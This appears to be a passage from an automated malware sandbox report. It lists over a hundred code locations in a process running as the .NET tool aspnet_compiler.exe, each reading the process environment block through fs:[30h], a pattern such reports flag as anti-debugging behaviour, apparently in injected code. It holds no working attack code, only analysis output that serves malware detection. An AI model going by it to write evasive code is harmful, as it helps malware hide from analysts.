                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010844B0 mov ecx, dword ptr fs:[00000030h]11_2_010844B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DA4B0 mov eax, dword ptr fs:[00000030h]11_2_010DA4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010504E5 mov ecx, dword ptr fs:[00000030h]11_2_010504E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C700 mov eax, dword ptr fs:[00000030h]11_2_0108C700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050710 mov eax, dword ptr fs:[00000030h]11_2_01050710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01080710 mov eax, dword ptr fs:[00000030h]11_2_01080710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C720 mov eax, dword ptr fs:[00000030h]11_2_0108C720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C720 mov eax, dword ptr fs:[00000030h]11_2_0108C720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108273C mov eax, dword ptr fs:[00000030h]11_2_0108273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108273C mov ecx, dword ptr fs:[00000030h]11_2_0108273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108273C mov eax, dword ptr fs:[00000030h]11_2_0108273C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CC730 mov eax, dword ptr fs:[00000030h]11_2_010CC730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108674D mov esi, dword ptr fs:[00000030h]11_2_0108674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108674D mov eax, dword ptr fs:[00000030h]11_2_0108674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108674D mov eax, dword ptr fs:[00000030h]11_2_0108674D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DE75D mov eax, dword ptr fs:[00000030h]11_2_010DE75D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050750 mov eax, dword ptr fs:[00000030h]11_2_01050750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D4755 mov eax, dword ptr fs:[00000030h]11_2_010D4755
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092750 mov eax, dword ptr fs:[00000030h]11_2_01092750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092750 mov eax, dword ptr fs:[00000030h]11_2_01092750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058770 mov eax, dword ptr fs:[00000030h]11_2_01058770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060770 mov eax, dword ptr fs:[00000030h]11_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F678E mov eax, dword ptr fs:[00000030h]11_2_010F678E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010507AF mov eax, dword ptr fs:[00000030h]11_2_010507AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011047A0 mov eax, dword ptr fs:[00000030h]11_2_011047A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105C7C0 mov eax, dword ptr fs:[00000030h]11_2_0105C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D07C3 mov eax, dword ptr fs:[00000030h]11_2_010D07C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010727ED mov eax, dword ptr fs:[00000030h]11_2_010727ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010727ED mov eax, dword ptr fs:[00000030h]11_2_010727ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010727ED mov eax, dword ptr fs:[00000030h]11_2_010727ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DE7E1 mov eax, dword ptr fs:[00000030h]11_2_010DE7E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010547FB mov eax, dword ptr fs:[00000030h]11_2_010547FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010547FB mov eax, dword ptr fs:[00000030h]11_2_010547FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE609 mov eax, dword ptr fs:[00000030h]11_2_010CE609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106260B mov eax, dword ptr fs:[00000030h]11_2_0106260B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092619 mov eax, dword ptr fs:[00000030h]11_2_01092619
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E627 mov eax, dword ptr fs:[00000030h]11_2_0106E627
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01086620 mov eax, dword ptr fs:[00000030h]11_2_01086620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088620 mov eax, dword ptr fs:[00000030h]11_2_01088620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105262C mov eax, dword ptr fs:[00000030h]11_2_0105262C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106C640 mov eax, dword ptr fs:[00000030h]11_2_0106C640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A660 mov eax, dword ptr fs:[00000030h]11_2_0108A660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A660 mov eax, dword ptr fs:[00000030h]11_2_0108A660
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01082674 mov eax, dword ptr fs:[00000030h]11_2_01082674
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111866E mov eax, dword ptr fs:[00000030h]11_2_0111866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111866E mov eax, dword ptr fs:[00000030h]11_2_0111866E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054690 mov eax, dword ptr fs:[00000030h]11_2_01054690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054690 mov eax, dword ptr fs:[00000030h]11_2_01054690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C6A6 mov eax, dword ptr fs:[00000030h]11_2_0108C6A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010866B0 mov eax, dword ptr fs:[00000030h]11_2_010866B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0108A6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A6C7 mov eax, dword ptr fs:[00000030h]11_2_0108A6C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D06F1 mov eax, dword ptr fs:[00000030h]11_2_010D06F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D06F1 mov eax, dword ptr fs:[00000030h]11_2_010D06F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE6F2 mov eax, dword ptr fs:[00000030h]11_2_010CE6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE6F2 mov eax, dword ptr fs:[00000030h]11_2_010CE6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE6F2 mov eax, dword ptr fs:[00000030h]11_2_010CE6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE6F2 mov eax, dword ptr fs:[00000030h]11_2_010CE6F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE908 mov eax, dword ptr fs:[00000030h]11_2_010CE908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE908 mov eax, dword ptr fs:[00000030h]11_2_010CE908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01048918 mov eax, dword ptr fs:[00000030h]11_2_01048918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01048918 mov eax, dword ptr fs:[00000030h]11_2_01048918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DC912 mov eax, dword ptr fs:[00000030h]11_2_010DC912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E892B mov eax, dword ptr fs:[00000030h]11_2_010E892B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D892A mov eax, dword ptr fs:[00000030h]11_2_010D892A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D0946 mov eax, dword ptr fs:[00000030h]11_2_010D0946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01076962 mov eax, dword ptr fs:[00000030h]11_2_01076962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01076962 mov eax, dword ptr fs:[00000030h]11_2_01076962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01076962 mov eax, dword ptr fs:[00000030h]11_2_01076962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109096E mov eax, dword ptr fs:[00000030h]11_2_0109096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109096E mov edx, dword ptr fs:[00000030h]11_2_0109096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109096E mov eax, dword ptr fs:[00000030h]11_2_0109096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DC97C mov eax, dword ptr fs:[00000030h]11_2_010DC97C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F4978 mov eax, dword ptr fs:[00000030h]11_2_010F4978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F4978 mov eax, dword ptr fs:[00000030h]11_2_010F4978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A0 mov eax, dword ptr fs:[00000030h]11_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010509AD mov eax, dword ptr fs:[00000030h]11_2_010509AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010509AD mov eax, dword ptr fs:[00000030h]11_2_010509AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D89B3 mov esi, dword ptr fs:[00000030h]11_2_010D89B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D89B3 mov eax, dword ptr fs:[00000030h]11_2_010D89B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D89B3 mov eax, dword ptr fs:[00000030h]11_2_010D89B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111A9D3 mov eax, dword ptr fs:[00000030h]11_2_0111A9D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E69C0 mov eax, dword ptr fs:[00000030h]11_2_010E69C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A9D0 mov eax, dword ptr fs:[00000030h]11_2_0105A9D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010849D0 mov eax, dword ptr fs:[00000030h]11_2_010849D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DE9E0 mov eax, dword ptr fs:[00000030h]11_2_010DE9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010829F9 mov eax, dword ptr fs:[00000030h]11_2_010829F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010829F9 mov eax, dword ptr fs:[00000030h]11_2_010829F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DC810 mov eax, dword ptr fs:[00000030h]11_2_010DC810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov eax, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov eax, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov eax, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov ecx, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov eax, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072835 mov eax, dword ptr fs:[00000030h]11_2_01072835
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F483A mov eax, dword ptr fs:[00000030h]11_2_010F483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F483A mov eax, dword ptr fs:[00000030h]11_2_010F483A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A830 mov eax, dword ptr fs:[00000030h]11_2_0108A830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01062840 mov ecx, dword ptr fs:[00000030h]11_2_01062840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054859 mov eax, dword ptr fs:[00000030h]11_2_01054859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054859 mov eax, dword ptr fs:[00000030h]11_2_01054859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01080854 mov eax, dword ptr fs:[00000030h]11_2_01080854
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6870 mov eax, dword ptr fs:[00000030h]11_2_010E6870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6870 mov eax, dword ptr fs:[00000030h]11_2_010E6870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DE872 mov eax, dword ptr fs:[00000030h]11_2_010DE872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DE872 mov eax, dword ptr fs:[00000030h]11_2_010DE872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050887 mov eax, dword ptr fs:[00000030h]11_2_01050887
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DC89D mov eax, dword ptr fs:[00000030h]11_2_010DC89D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E8C0 mov eax, dword ptr fs:[00000030h]11_2_0107E8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C8F9 mov eax, dword ptr fs:[00000030h]11_2_0108C8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C8F9 mov eax, dword ptr fs:[00000030h]11_2_0108C8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111A8E4 mov eax, dword ptr fs:[00000030h]11_2_0111A8E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CEB1D mov eax, dword ptr fs:[00000030h]11_2_010CEB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107EB20 mov eax, dword ptr fs:[00000030h]11_2_0107EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107EB20 mov eax, dword ptr fs:[00000030h]11_2_0107EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01118B28 mov eax, dword ptr fs:[00000030h]11_2_01118B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01118B28 mov eax, dword ptr fs:[00000030h]11_2_01118B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F8B42 mov eax, dword ptr fs:[00000030h]11_2_010F8B42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6B40 mov eax, dword ptr fs:[00000030h]11_2_010E6B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6B40 mov eax, dword ptr fs:[00000030h]11_2_010E6B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111AB40 mov eax, dword ptr fs:[00000030h]11_2_0111AB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01104B4B mov eax, dword ptr fs:[00000030h]11_2_01104B4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01104B4B mov eax, dword ptr fs:[00000030h]11_2_01104B4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FEB50 mov eax, dword ptr fs:[00000030h]11_2_010FEB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104CB7E mov eax, dword ptr fs:[00000030h]11_2_0104CB7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01104BB0 mov eax, dword ptr fs:[00000030h]11_2_01104BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01104BB0 mov eax, dword ptr fs:[00000030h]11_2_01104BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060BBE mov eax, dword ptr fs:[00000030h]11_2_01060BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060BBE mov eax, dword ptr fs:[00000030h]11_2_01060BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050BCD mov eax, dword ptr fs:[00000030h]11_2_01050BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050BCD mov eax, dword ptr fs:[00000030h]11_2_01050BCD
